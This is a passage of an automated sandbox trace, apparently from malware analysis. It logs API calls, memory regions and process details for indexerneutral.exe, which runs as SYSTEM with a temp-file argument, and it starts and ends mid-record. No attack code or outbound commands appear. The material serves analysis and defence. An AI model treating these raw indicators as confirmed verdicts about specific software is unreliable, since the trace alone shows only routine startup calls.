lpUsedDefaultChar=0x0) returned 14 [0255.058] strlen (_Str="Modified Time") returned 0xd [0255.058] WriteFile (in: hFile=0x20c, lpBuffer=0x19d740*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x19f740, lpOverlapped=0x0 | out: lpBuffer=0x19d740*, lpNumberOfBytesWritten=0x19f740*=0xd, lpOverlapped=0x0) returned 1 [0255.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x19d744, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0255.058] strlen (_Str="\r\n") returned 0x2 [0255.058] WriteFile (in: hFile=0x20c, lpBuffer=0x19d744*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f744, lpOverlapped=0x0 | out: lpBuffer=0x19d744*, lpNumberOfBytesWritten=0x19f744*=0x2, lpOverlapped=0x0) returned 1 [0255.058] CloseHandle (hObject=0x20c) returned 1 [0255.059] SetCursor (hCursor=0x10007) returned 0x10007 [0255.061] DeleteObject (ho=0x50a01f1) returned 1 [0255.061] exit (_Code=0) Thread: id = 522 os_tid = 0x41c Thread: id = 524 os_tid = 0x4a0 Thread: id = 527 os_tid = 0x4f0 Process: id = "29" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x1ec2f000" os_pid = "0x428" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x6cc" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3977 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3978 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3979 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3980 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3981 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3982 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3983 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3984 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3985 start_va = 0x77510000 end_va = 0x77688fff entry_point = 0x77510000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3986 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3987 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3988 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3989 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3990 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3991 start_va = 0x7fff0000 end_va = 0x7fff9f1bffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3992 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3993 start_va = 0x7fff9f382000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007fff9f382000" filename = "" Region: id = 4030 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4031 start_va = 0x72130000 end_va = 0x721a2fff entry_point = 0x72130000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4032 start_va = 0x721b0000 end_va = 0x721fefff entry_point = 0x721b0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4033 start_va = 0x72200000 end_va = 0x72207fff entry_point = 0x72200000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4037 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4038 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4039 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4040 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4041 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4042 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4043 start_va = 0x480000 end_va = 0x53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4044 start_va = 0x550000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4045 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4046 start_va = 0x750000 end_va = 0x8d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4047 start_va = 0x900000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 4048 start_va = 0x910000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 4049 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4050 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4051 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4052 start_va = 0x74640000 end_va = 0x746ebfff entry_point = 0x74640000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4053 start_va = 0x74790000 end_va = 0x75b4efff entry_point = 0x74790000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4054 start_va = 0x75ca0000 end_va = 0x75e59fff entry_point = 0x75ca0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4055 start_va = 0x75e60000 end_va = 0x75f1dfff entry_point = 0x75e60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4056 start_va = 0x760a0000 end_va = 0x760e3fff entry_point = 0x760a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4057 start_va = 0x760f0000 end_va = 0x7616afff entry_point = 0x760f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4058 start_va = 0x76210000 end_va = 0x76252fff entry_point = 0x76210000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4059 start_va = 0x76320000 end_va = 0x76495fff entry_point = 0x76320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4060 start_va = 0x765e0000 end_va = 0x765eefff entry_point = 0x765e0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4061 start_va = 0x765f0000 end_va = 0x766dffff entry_point = 0x765f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4062 start_va = 0x76aa0000 end_va = 0x76ae3fff entry_point = 0x76aa0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4063 start_va = 0x76af0000 end_va = 0x76c3cfff entry_point = 0x76af0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4064 start_va = 0x76c40000 end_va = 0x76c4bfff entry_point = 0x76c40000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4065 start_va = 0x76c50000 end_va = 0x7712cfff entry_point = 0x76c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4066 start_va = 0x77310000 end_va = 0x7744ffff entry_point = 0x77310000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4067 start_va = 0x77450000 end_va = 0x774dcfff entry_point = 0x77450000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4068 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4069 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 4070 start_va = 0x75b50000 end_va = 0x75c39fff entry_point = 0x75b50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4071 start_va = 0xaa0000 end_va = 0xb30fff entry_point = 0xaa0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Thread: id = 521 os_tid = 0x450 [0251.220] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0251.221] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765f0000 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="FlsAlloc") returned 0x7660a330 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="FlsFree") returned 0x7660f400 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="FlsGetValue") returned 0x76607580 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="FlsSetValue") returned 0x76609910 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="InitializeCriticalSectionEx") returned 0x76616030 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="CreateEventExW") returned 0x76615f90 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSemaphoreExW") returned 0x76615ff0 [0251.221] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadStackGuarantee") returned 0x7660a5d0 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThreadpoolTimer") returned 0x7660a690 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadpoolTimer") returned 0x775440f0 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7753d630 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="CloseThreadpoolTimer") returned 0x7753ecf0 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThreadpoolWait") returned 0x76615720 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadpoolWait") returned 0x7753e140 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="CloseThreadpoolWait") returned 0x7753eb60 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="FlushProcessWriteBuffers") returned 0x77579990 [0251.222] GetProcAddress (hModule=0x765f0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77575540 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentProcessorNumber") returned 0x77569dc0 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="GetLogicalProcessorInformation") returned 0x7660a550 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSymbolicLinkW") returned 0x76630a40 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="SetDefaultDllDirectories") returned 0x76450790 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="EnumSystemLocalesEx") returned 0x7660f8a0 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="CompareStringEx") returned 0x7660fa30 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="GetDateFormatEx") returned 0x76631030 [0251.223] GetProcAddress (hModule=0x765f0000, lpProcName="GetLocaleInfoEx") returned 0x7660a000 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="GetTimeFormatEx") returned 0x766314b0 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="GetUserDefaultLocaleName") returned 0x7660a4f0 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="IsValidLocaleName") returned 0x766316f0 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="LCMapStringEx") returned 0x76609970 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentPackageId") returned 0x763d3c90 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="GetTickCount64") returned 0x76608710 [0251.224] GetProcAddress (hModule=0x765f0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0251.225] GetProcAddress (hModule=0x765f0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0251.225] GetCurrentThreadId () returned 0x450 [0251.225] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x407402, hStdOutput=0x87ddb6bb, hStdError=0x406aa2)) [0251.225] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0251.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0251.225] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0251.226] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"" [0251.226] GetEnvironmentStringsW () returned 0x5603a0* [0251.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1355, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1355 [0251.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1355, lpMultiByteStr=0x560e40, cbMultiByte=1355, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1355 [0251.226] FreeEnvironmentStringsW (penv=0x5603a0) returned 1 [0251.226] GetLastError () returned 0x7f [0251.226] SetLastError (dwErrCode=0x7f) [0251.226] GetLastError () returned 0x7f [0251.226] SetLastError (dwErrCode=0x7f) [0251.226] GetLastError () returned 0x7f [0251.226] SetLastError (dwErrCode=0x7f) [0251.226] GetACP () returned 0x4e4 [0251.226] GetLastError () returned 0x7f [0251.226] SetLastError (dwErrCode=0x7f) [0251.226] IsValidCodePage (CodePage=0x4e4) returned 1 [0251.226] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fed4 | out: lpCPInfo=0x19fed4) returned 1 [0251.226] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f99c | out: lpCPInfo=0x19f99c) returned 1 [0251.226] GetLastError () returned 0x7f [0251.226] SetLastError (dwErrCode=0x7f) [0251.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.226] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x19f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0251.226] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9b0 | out: lpCharType=0x19f9b0) returned 1 [0251.226] GetLastError () returned 0x7f [0251.227] SetLastError (dwErrCode=0x7f) [0251.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x19f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0251.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.227] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0251.227] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fcb0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\x